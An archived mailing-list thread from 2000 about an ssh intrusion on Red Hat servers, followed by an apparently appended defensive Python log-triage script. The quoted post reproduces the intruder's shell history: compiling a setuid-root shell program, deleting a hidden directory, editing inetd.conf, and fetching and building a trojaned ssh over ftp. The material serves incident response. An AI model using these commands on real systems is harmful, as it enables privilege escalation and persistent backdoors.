Of course you installed every security update that Red Hat released, correct?
On Sun, 2 Jan 2000, Michael Hatchard wrote:
> To All
>
> Someone has hacked into our system.
>
> I'm not quite sure how he is getting in.
>
> But here is some info from my logs.
>
> It looks like it starts here from my guess
> machine admin (software testing machine)
> Redhat 6.0
> ssh 1.2.27-5i
>
> Dec 31 01:25:31 admin sshd connect from 194.109.6.45 port 58440
> Dec 31 01:25:40 admin sshd fatal: Did not receive ident string
> Dec 31 01:26:45 admin sshd connect from 194.109.6.45 port 58445
> Dec 31 01:26:45 admin sshd fatal: Local: This server does not support your new ssh version
> Dec 31 01:26:46 admin sshd connect from 194.109.6.45 port 1009
> Dec 31 01:26:58 admin sshd fatal: Connection closed by remote
> Dec 31 01:26:58 admin PAM_pwdb 2 authentication failures; (uid=0) => mhatch for ssh service
> Another 2 attempts at 01:30:03 and 01:30:04 at ports 58454 and 1009
> Dec 31 01:30:06 admin sshd log: Unknown group id 530
> Dec 31 01:30:07 admin PAM_pwdb get passwd; pwdb: structure is no longer valid
> As line above at 01:30:17 and 01:30:21
> Another connection at 01:44:02 then again at 05:50:23 05:50:27
> Dec 31 05:50:49 admin sshd fatal: Could not load host key: /etc/ssh_host_key. Check path and permission's
>
> In the tmp dir I found
> .bash_history Dec 31 05:53 with
> id
> rm -rf /dev/...
> w
> exit
> pico
> cc -o uid uid.c
> ./uid
> exit
> ./uid
> ls
> rm -rf rc
> cd /usr/bin
> ls -al |grep crontab
> ls
> cd /tmp
> ls
> pico /etc/inetd.conf
> killall -9 inetd
> /usr/bin/inetd
> pico /etc/inetd.conf
> killall -9 inetd
> /usr/bin/inetd
> ftp linux.tai.com.pl
> gzip -d ssh*
> tar -xvf ssh*
> cd ssh*
> ./setup.sh m4c3r0x 1.2.27
> ./configure;make
> ls
> cd ..
> rm -rf ssh*
> ftp linux.tai.com.pl
> ls
>
> From here on he just moves sshd and changes its permissions and later exits the system
>
> File uid.c contains
> #include <unistd.h>
> main ()
> {
> setguid(0)
> setuid(0)
> excel("/bin/sh","/bin/sh",NULL);
> }
>
> There are also new config files for ssh in /etc
>
> He tries my email machine at Dec 31 06:46:37
> Redhat 5.0
> ssh 1.2.26-4i
> Same IP number but PAM_pwdb (su) session opened for user bla by bla2(uid=0)
> There is a .bash_history file again in tmp Dec 31 07:02 with similar info as above.
> New ssh config files in /etc
>
> He logs into my name server/proxy machine at Dec 31 14:48:56
> Redhat 5.0
> ssh 1.2.26-4i
> Same IP number and same info in .bash_history file and new ssh config files in etc
>
> How can I keep this person out of our system?
>
>
> Thanks
> Michael
>
>
> --
> To unsubscribe: mail [EMAIL PROTECTED] with "unsubscribe"
> as the Subject.
>
-----------------------------------------------------
Brian Feeny (BF304) [EMAIL PROTECTED]
318-222-2638 x 109 http://www.shreve.net/~signal
Network Administrator ShreveNet Inc. (ASN 11881)
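One way to triage a log extract like the one quoted above, as an added example written for this thread and not taken from either post: it parses syslog lines in the old sshd/PAM_pwdb format (no PIDs, so follow-on messages are tied to the most recent "connect from"), counts connects, version probes and authentication failures per source IP, and separates out sshd's own "Unknown group id" / "Could not load host key" messages, which in the post only appear after the attacker has rebuilt sshd. The sample lines and the 10.0.0.7 entry are constructed.

```python
import re
from collections import defaultdict

# Constructed sample, laid out like the syslog extract quoted in the post (no PIDs in this old format).
SAMPLE_LOG = """\
Dec 31 01:25:31 admin sshd connect from 194.109.6.45 port 58440
Dec 31 01:25:40 admin sshd fatal: Did not receive ident string
Dec 31 01:26:45 admin sshd connect from 194.109.6.45 port 58445
Dec 31 01:26:45 admin sshd fatal: Local: This server does not support your new ssh version
Dec 31 01:26:46 admin sshd connect from 194.109.6.45 port 1009
Dec 31 01:26:58 admin sshd fatal: Connection closed by remote
Dec 31 01:26:58 admin PAM_pwdb 2 authentication failures; (uid=0) => mhatch for ssh service
Dec 31 01:30:06 admin sshd log: Unknown group id 530
Dec 31 05:50:49 admin sshd fatal: Could not load host key: /etc/ssh_host_key. Check path and permissions.
Dec 31 09:00:00 admin sshd connect from 10.0.0.7 port 40001
"""

LINE_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) (\S+) (sshd|PAM_pwdb) (.*)$")
CONNECT_RE = re.compile(r"connect from (\S+) port (\d+)")
AUTHFAIL_RE = re.compile(r"(\d+) authentication failures?; .*=> (\S+) for ssh")
PROBE_MARKERS = ("Did not receive ident string", "does not support your new ssh version")  # banner/version probing
INTEGRITY_MARKERS = ("Unknown group id", "Could not load host key")  # sshd's own config/binary looks wrong

def triage(log_text):
    """Return (per_source, host_alerts): per-IP counters, plus sshd self-integrity messages."""
    per_source = defaultdict(lambda: {"connects": 0, "probes": 0, "auth_failures": 0, "targets": set()})
    host_alerts, last_ip = [], None
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, _host, prog, msg = m.groups()
        c = CONNECT_RE.search(msg)
        if c:  # without PIDs, later messages can only be tied to the most recent "connect from"
            last_ip = c.group(1)
            per_source[last_ip]["connects"] += 1
        elif last_ip and any(k in msg for k in PROBE_MARKERS):
            per_source[last_ip]["probes"] += 1
        elif last_ip and prog == "PAM_pwdb" and (a := AUTHFAIL_RE.search(msg)):
            per_source[last_ip]["auth_failures"] += int(a.group(1))
            per_source[last_ip]["targets"].add(a.group(2))
        elif any(k in msg for k in INTEGRITY_MARKERS):
            host_alerts.append((ts, msg))
    return dict(per_source), host_alerts

def suspicious_sources(per_source):
    """IPs that probed the server version and then racked up authentication failures."""
    return sorted(ip for ip, s in per_source.items() if s["probes"] and s["auth_failures"])
```

Host-level alerts carry no source IP on purpose: a missing host key or unknown group after a period of normal operation points at the sshd installation itself, which is what the .bash_history in the post confirms.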